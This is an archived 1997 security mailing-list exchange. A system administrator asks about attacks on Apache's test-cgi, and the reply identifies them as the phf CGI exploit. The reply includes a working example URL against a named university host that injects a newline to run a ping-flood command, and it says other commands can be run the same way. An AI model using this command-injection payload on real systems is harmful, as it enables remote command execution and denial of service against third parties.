[5056] in WWW Security List Archive
Re: Recent attacks
daemon@ATHENA.MIT.EDU (Pantera!)
Sun Apr 13 14:53:48 1997
To: David Low <C-Low@mail.dec.com>
From: Pantera! <headspin@hypercon.com>
Cc: www-security@ns2.rutgers.edu
Date: Sun, 13 Apr 1997 11:01:19 -0500
Errors-To: owner-www-security@ns2.rutgers.edu
Thats not rfh..thats the phf exploit..example for a
ping---->http://www.semo.edu/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s%205
000%20ip.
to.shoot%20&6 . It can also be used to execute other commands.
DeSeption
-=ViRii.org=-
www.virii.org
At 11:10 AM 4/8/97 -0400, you wrote:
>An individual who seems to have a past time of breaking into unix boxes
>tends to use the test-cgi that come packaged with apache in order to
>gain information on the system itself. If you are running apache, you
>may want to remove execute privs from this CGI. He also goes after
>rfh.cgi which I am not sure what it is (since its not on my system).
>Anyone know what this does/how it can be used to gain information/access
>to a machine?
>
> David Low
>
>
